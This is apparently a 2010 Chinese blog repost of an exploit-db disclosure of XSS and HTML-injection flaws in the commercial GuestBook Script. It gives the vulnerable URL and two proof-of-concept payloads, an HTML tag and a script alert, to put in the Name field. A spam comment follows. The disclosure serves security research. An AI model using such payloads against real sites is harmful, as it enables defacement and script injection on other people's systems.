GuestBook Script 多处漏洞
发布:wpulog | 发布时间: 2010年8月16日 GuestBook Script是一款基于PHP语言的留言系统,该系统的演示版中存在XSS和HTML注入漏洞,这些漏洞也可能在收费版中存在。
[+]info:
~~~~~~~~~
# GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities
# Vendor: http://www.guestbookscripts.com/demo_guestbook.php
# Author: AnTi SeCuRe
# Greets: Sa-ViRuS.CoM , RENO , Dr.php , ! BaD BoY ! , Gov.HaCker , Dr.$audi all Sa-ViRuS.CoM Members ..
# Contact: AnTi-SeCuRe@HoTMaiL.CoM
# Home: WwW.Sa-ViRuS.CoM
[+]poc:
~~~~~~~~~
[~]Note : Its not free ,, Its By 17,99
[~]You Can Buy It From : http://www.guestbookscripts.com/buy_guestbook.php
[~] HTML Injection Vuln . : http://server/demo_guestbook.php?act=new
Add A New Comment And The exploit is in Name :)
<p align="center"><b>Sa-ViRuS.CoM</b></p>
[~] Xss Vuln. : http://server/demo_guestbook.php?act=new
Add A New Comment And The exploit is in Name :)
<script>alert('AnTi SeCuRe - Sa-ViRuS.CoM')</script>
[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/14648
1.fusionmachine- http://www.finefusionmachine.com
- 技术论坛啊,相当不错,来学习。fusion machine
- 2012-1-6 11:23:32 回复该留言
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。